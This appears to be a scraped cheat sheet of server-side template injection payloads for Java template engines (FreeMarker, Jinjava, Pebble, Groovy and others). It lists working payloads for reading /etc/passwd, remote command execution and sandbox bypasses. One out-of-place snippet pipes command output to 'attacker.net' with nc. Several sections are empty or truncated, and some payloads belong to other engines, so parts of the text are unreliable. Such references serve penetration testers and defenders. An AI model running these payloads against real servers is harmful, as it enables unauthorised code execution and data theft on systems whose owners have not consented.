9.7 KiB
Server Side Template Injection - Java
Templating Libraries
Template Name | Payload Format |
Codepen | #{} |
Freemarker | ${3*3} , #{3*3} , [=3*3] |
Groovy | ${9*9} |
Jinjava | {{ }} |
Pebble | {{ }} |
Spring | *{7*7} |
Thymeleaf | [[ ]] |
Velocity | #set($X="") $X |
Java - Basic injection
Multiple variable expressions can be used, if
doesn't work try#{...}
Java - Retrieve the system’s environment variables
Java - Retrieve /etc/passwd
${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}
Apache FreeMarker™ is a template engine: a Java library to generate text output (HTML web pages, e-mails, configuration files, source code, etc.) based on templates and changing data.
You can try your payloads at https://try.freemarker.apache.org
Freemarker - Basic injection
The template can be :
- Default:
- Legacy:
- Alternative:
since FreeMarker 2.3.4
Freemarker - Read File
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('path_to_the_file').toURL().openStream().readAllBytes()?join(" ")}
Convert the returned bytes to ASCII
Freemarker - Code execution
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
Freemarker - Sandbox bypass
⚠️ only works on Freemarker versions below 2.3.30
<#assign classloader=article.class.protectionDomain.classLoader>
<#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
<#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)>
<#assign ec=classloader.loadClass("freemarker.template.utility.Execute")>
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.net 80')
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
Java-based template engine based on django template syntax, adapted to render jinja templates (at least the subset of jinja in use in HubSpot content).
Jinjava - Basic injection
{{'a'.toUpperCase()}} would result in 'A'
{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
Jinjava is an open source project developed by Hubspot, available at https://github.com/HubSpot/jinjava/
Jinjava - Command execution
Fixed by https://github.com/HubSpot/jinjava/pull/230
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
Pebble is a Java templating engine inspired by Twig and similar to the Python Jinja Template Engine syntax. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization.
Pebble - Basic injection
{{ someString.toUPPERCASE() }}
Pebble - Code execution
Old version of Pebble ( < version 3.0.9): {{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
New version of Pebble :
{% set cmd = 'id' %}
{% set bytes = (1).TYPE
.readAllBytes() %}
{{ (1).TYPE
.newInstance(([bytes]).toArray()) }}
Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code.
#foreach($i in [1..$out.available()])
Groovy - Basic injection
Refer to https://groovy-lang.org/syntax.html , but ${9*9}
is the basic injection.
Groovy - Read and create File
${String x = new File('c:/windows/notepad.exe').text}
${String x = new File('/path/to/file').getText('UTF-8')}
${new File("C:\Temp\FileName.txt").createNewFile();}
Groovy - HTTP request:
${new URL("http://www.google.com").getText()}
Groovy - Command Execution
${this.evaluate("9*9") //(this is a Script class)}
${new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()}
Groovy - Sandbox Bypass
${ @ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
def x }
${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") }
- Server Side Template Injection – on the example of Pebble - Michał Bentkowski - September 17, 2019
- Server-Side Template Injection: RCE For The Modern Web App - James Kettle (@albinowax) - December 10, 2015
- Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle (@albinowax) - August 8, 2015
- Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle (@albinowax) - December 28, 2015
- VelocityServlet Expression Language injection - MagicBlue - November 15, 2017